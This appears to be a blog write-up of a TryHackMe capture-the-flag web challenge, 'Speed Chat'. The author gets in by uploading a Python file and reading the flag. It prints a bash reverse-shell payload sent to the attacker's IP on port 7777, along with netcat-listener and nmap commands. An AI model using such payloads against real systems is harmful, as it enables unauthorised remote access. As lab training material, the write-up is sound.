Speed Chat

1 minute read

🌐 Love at First Breach 2026 - Speed Chat

Category Author
🌐 Web TryHackMe

Challenge Prompt

My Dearest Hacker,

Days before Valentine’s Day, TryHeartMe rushed out a new messaging platform called “Speed Chatter”, promising instant connections and private conversations. But in the race to beat the holiday deadline, security took a back seat. Rumours are circulating that “Speed Chatter” was pushed to production without proper testing.

As a security researcher, it’s your task to break into “Speed Chatter”, uncover flaws, and expose TryHeartMe’s negligence before the damage becomes irreversible.

You can find the web application here: http://MACHINE_IP:5000

Problem Type

  • Web

Solve

When we visit the website, we get a chat window and profile window. I started off with sending a chat to see if there would be a response, but there wasn’t. image

It appears we can upload a file. Let’s run a quick nmap scan to see what language the site is running. I used nmap -p 5000 -T4 -A <SITE IP HERE>: image

Looks like this is running in Python, so let’s try a Python reverse shell. We will do a really simple one that calls a bash reverse shell from Payloads All The Things:

1
2
import os
os.system("bash -c 'bash -i >& /dev/tcp/<YOUR VPN IP>/7777 0>&1'")

Save this file as exploit.py.

Then you can start a netcat listener on your machine using nc -nvlp 7777 in the terminal.

On the website, click Choose File and pick your exploit.py file. Then click Upload. When you return to your termial you should have access.
image

Then you can run ls -la

There you will see the flag.txt file which you can cat out to the screen: image

Tags: ,

Categories:

Updated: